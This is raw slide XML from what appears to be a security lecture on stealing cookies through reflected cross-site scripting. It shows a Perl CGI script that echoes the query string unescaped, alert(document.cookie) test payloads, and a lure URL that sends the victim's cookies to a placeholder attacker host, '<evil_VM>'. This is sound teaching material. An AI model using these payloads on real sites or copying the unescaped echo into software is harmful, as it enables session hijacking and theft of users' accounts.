              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Query string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name=&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This query string would </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>be echoed back by the server to the browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and the browser would ordinarily process the JavaScript in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of the string </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Display </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>cookie(s) in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219431414"/>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534400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Stealing Cookies via XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attack (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>evil attacker lures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>victims with the following URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil_VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>collect.cgi?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="%2Bdocument.cookie)&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ttacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>has a web server running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>machine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>-bin includes a script called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>collect.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> that simply collects the information sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil_VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the browser on the victim machine because of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>code in the query-string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>portion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>of the URL. Now the attacker would be able to harvest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>in the victim’s browser for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> web site </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2609988447"/>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534400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Stealing Cookies via XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attack (4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8610600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = '';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> = $ENV{QUERY_STRING};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/+/ /;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/%([a-fA-F0-9]{2,2})/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>($1))/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> =~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;!--(.|\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)*--&gt;//g;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>forminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>echo back </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>browser a query string if it is found attached to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>received from the browser </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a clueless client has engaged in a session with this web page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>assume that the same client has received a very authentic looking email that lures him/her into clicking on a link that points to the following URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>);&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=&lt;script&gt;alert("Hello from a cookie stealer");&lt;/script&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
